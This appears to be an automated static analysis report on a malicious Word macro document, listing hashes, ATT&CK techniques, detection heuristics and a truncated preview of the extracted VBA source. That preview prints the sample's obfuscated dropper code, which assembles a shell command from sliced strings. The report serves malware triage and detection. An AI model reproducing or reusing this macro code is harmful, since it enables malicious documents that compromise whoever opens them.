Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9f84428908f16511…

MALICIOUS

Office (OLE)

Size: 221.0 KB
Created: 2018-02-06 15:54:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: a2f2167e0eae1a6f8406b1d8dc21d464
SHA-1: 54ce0c1cc770384d0e451b87a15603b823a04546
SHA-256: 9f84428908f16511529c2589a917e7f53b3568cd7a7832d966cf06333bb26bcb
Risk Score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic because it indicates an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags an auto-execution marker combined with execution tokens. The ClamAV detections 'Img.Dropper.PhishingLure-6443153-0' and 'Doc.Trojan.Obfuscated-6443078-0' confirm that the file is malicious and suggest it acts as a dropper for other malware.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 80504 bytes
SHA-256: d90155808ced037f6784b3c18ab2723cfb188f5bd1544cdbc72e1f0bbc582ee5
Detection
ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iwlQGUsNRYV"
Function NpYmCPnj()
On Error Resume Next
wXqrIlbTwzH = ("dbFrvOZsqtYQzIcpHiUuHpNnAScfaFHa")
JDiQDYt = 3901150 - Sqr(PIVZCXZCPH * Fix(iRZtXYLi) + 2575741 / wAOpXqrBvOGSXV) - 193789 * knTLTHw * sZfizrZzG + CDbl(4469393 * Int(3374510) / 1548307 * Tan(1258663)) / ijhBUtFPtDsS / CByte(7658098 - CDbl(KCfqCvwwLM))
wrVGHtL = 392228 - Sqr(pJLADsw * Fix(ImdSnFN) + 5611619 / bljEAmEraGK) - 7566441 * VVzQDwDtAzT * PXYNDwhTSjaVz + CDbl(7872812 * Int(4321388) / 1352029 * Tan(1748112)) / mnNcRISWCRZ / CByte(7473941 - CDbl(mMRlPjdWJdT))
ZjWKVC = Mid(wXqrIlbTwzH, 19, 10)
VoWPWzqS = ("BdwifswrzhuwnHcw%=o^we^ruEGTCcS")
LRMvpKfV = 3173662 - Sqr(zUjCGTVdZ * Fix(wnpKLajM) + 5296960 / JoIFZrts) - 1024362 * KHAWYMrXwn * czKiRZRf + CDbl(6015003 * Int(2787467) / 9725554 * Tan(4173306)) / DJLbdPZ / CByte(5696643 - CDbl(EwrmTmziLP))
CvFrX = 7665064 - Sqr(hpwaHRb * Fix(aGMlzSOA) + 3128647 / hNdEvNniGfjwDi) - 6508242 * WUNAVzwRzzjFpB * wSQiaccukn + CDbl(5687520 * Int(2156340) / 9211620 * Tan(6105600)) / DdDzvunPYjP / CByte(2291249 - CDbl(zdhoFIhi))
XOfKzCz = Mid(VoWPWzqS, 15, 10)
cAPbjQCY = ("HnjEwljLVvfGHh%=p&&set %YLtiJsiIBWvimjzpUAsvDD")
uFDkNMjzw = 6775563 - Sqr(jaqGHbWWawbcq * Fix(zdQzmQatZnuXV) + 5621436 / AzMpkmfNaHLz) - 1191711 * HjcQMBh * ADSTqBCLkGtn + CDbl(5072756 * Int(9946815) / 2829255 * Tan(7357068)) / CSQqqbRT / CByte(8125408 - CDbl(ESGJbBPzJ))
qPKKMcFtcSk = 4426253 - Sqr(vdKOWFFSc * Fix(UqKJjQuJ) + 5531482 / zAjztdz) - 3441630 * LAFPpHoFcTVL * NKkbwzr + CDbl(7109558 * Int(4009219) / 8030603 * Tan(6207837)) / RvtNVtHnfR / CByte(1325693 - CDbl(bUCvKSpGp))
kAGGDYnUvZn = Mid(cAPbjQCY, 12, 13)
MDmTPnopOkV = ("HJcMbLEQaNH%=DwEEILqvzjsWp")
Zzvhj = 9657470 - Sqr(mJKkDnlp * Fix(roaaHCoGkW) + 2808169 / zYsjTwZS) - 9696791 * jckQDtZoj * pwoSWhjjsI + CDbl(1312347 * Int(9277866) / 6849307 * Tan(9021513)) / lRDjrMWViFzpr / CByte(9724962 - CDbl(jwpsWwjaKmNqZq))
uBzhzXnfwv = 1189119 - Sqr(spaScWEpJTdKN * Fix(rrkwbKGrYr) + 312618 / swdVzfYRFzQfR) - 2050011 * AiDVZNmvVFaPw * BRjQmdILnVzl + CDbl(9143964 * Int(3661145) / 8444850 * Tan(5224299)) / hQSGIUV / CByte(5421918 - CDbl(GBHQWQckDij))
nwNHCmtczlT = Mid(MDmTPnopOkV, 9, 5)
YLSwHizB = ("tsJwhJwzc              XzfzdNTTiLiJAGjEwzspd")
tjjPJq = 1662649 - Sqr(QKAEYbPfYF * Fix(qEIKDjFMDkBD) + 206982 / aCZYaVtOKZT) - 1232773 * UYwMrpbpFHquAC * FmPGzZzZpGz + CDbl(7056849 * Int(7711179) / 5346766 * Tan(8890088)) / qzjkoGYJOZpV / CByte(9057843 - CDbl(iaSPJYJNGaWz))
BXoaH = 1283658 - Sqr(tEnNKYA * Fix(QSpwNFsajciGcX) + 3546893 / SVZdqJOpAS) - 3236150 * mcKWjhJA * KKEVjquVAc + CDbl(4129447 * Int(7309616) / 2774208 * Tan(8993175)) / zXGHEAwvohoGR / CByte(1447479 - CDbl(vOSzHLVIKS))
dizRzdh = Mid(YLSwHizB, 10, 14)
hBpVwzBFD = ("ulvfcndJSkSaNMRjitEtvamz=^he^l^l&&set VErpT")
lVEEpiS = 1097714 - Sqr(YczFFHiEqNpwKh * Fix(mjrqYJdDvtGU) + 619019 / VDAHSUmM) - 3228973 * TjcmFXwnGK * oCnhjvYBMwmauV + CDbl(1916585 * Int(7874749) / 8297249 * Tan(8531760)) / uZTSWrhqz / CByte(4604296 - CDbl(TNsOhAMaiYNKEa))
NbXLbHFWs = 6346009 - Sqr(hRviFut * Fix(WVkRpCEbd) + 2914176 / ZijnJcQKohO) - 2763134 * pmAYCprYUcrMQ * kjUmjpvHWAimGo + CDbl(7077232 * Int(1075525) / 6706735 * Tan(1443572)) / rcDCfZoX / CByte(1097721 - CDbl(Gobthjd))
hCJPO = Mid(hBpVwzBFD, 25, 14)
REBOJpF = ("wnnlIuwbLZDqmjiznczXOTwhRZITpUjB")
lcaHNpTi = 3117930 - Sqr(muXkNHtwrrHYb * Fix(BHhRuiLzAoZ) + 4392770 / ZwnGCKLRsbnzwO) - 6569997 * SAiicjTHwvlj * uiKqITCElENQM + CDbl(1627227 * Int(6125031) / 8825598 * Tan(3619199)) / QdQhnqsWqcfHGZ / CByte(5954376 - CDbl(wtcIoufchwV))
wwSHvjSRp = 2694766 - Sqr(anNjwVCXM * Fix(UwmdZYdzoljJmR) + 2004704 / VzoArViF) - 2998920 * SbIEcElzIKCRG * DwhcjRB + CDbl(9368245 * Int(4181731) / 8055762 * Tan(9919517)) / jMDwTjN / CByte(7138529 - CDbl(CpjJfXo))
HwdzqbZbv = Mid(REBOJpF, 4, 10)
cwKTwh
... (truncated)